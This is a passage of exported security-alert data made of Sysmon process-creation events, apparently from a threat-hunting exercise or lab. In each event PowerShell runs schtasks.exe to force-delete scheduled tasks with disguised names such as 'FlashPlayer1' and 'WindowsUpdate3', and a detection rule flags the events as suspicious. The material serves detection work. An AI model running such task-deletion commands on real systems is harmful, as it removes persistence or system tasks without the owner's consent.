Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.480",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.735 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-001034323100} +ProcessId: 988 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.743471100Z"",""eventRecordID"":""3948"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.735\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-001034323100}\r\nProcessId: 988\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 
6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.735"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-001034323100}"",""processId"":""988"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.455",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.685 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-0010b42f3100} +ProcessId: 7188 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.687726700Z"",""eventRecordID"":""3947"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.685\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-0010b42f3100}\r\nProcessId: 7188\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: 
Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.685"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-0010b42f3100}"",""processId"":""7188"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.436",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.658 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-0010a72d3100} +ProcessId: 7776 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN AdobeFlashPlayer /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.660819800Z"",""eventRecordID"":""3946"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.658\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-0010a72d3100}\r\nProcessId: 7776\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.658"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-0010a72d3100}"",""processId"":""7776"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN AdobeFlashPlayer /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.428",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.628 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-0010982b3100} +ProcessId: 4912 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.630804200Z"",""eventRecordID"":""3945"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.628\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-0010982b3100}\r\nProcessId: 4912\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.628"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-0010982b3100}"",""processId"":""4912"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.408",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.604 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-00105e293100} +ProcessId: 5956 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.607291100Z"",""eventRecordID"":""3944"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.604\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-00105e293100}\r\nProcessId: 5956\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:39.604"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-00105e293100}"",""processId"":""5956"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.390",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.575 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-00106f263100} +ProcessId: 8080 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.578121600Z"",""eventRecordID"":""3943"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.575\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-00106f263100}\r\nProcessId: 8080\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 
6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.575"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-00106f263100}"",""processId"":""8080"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 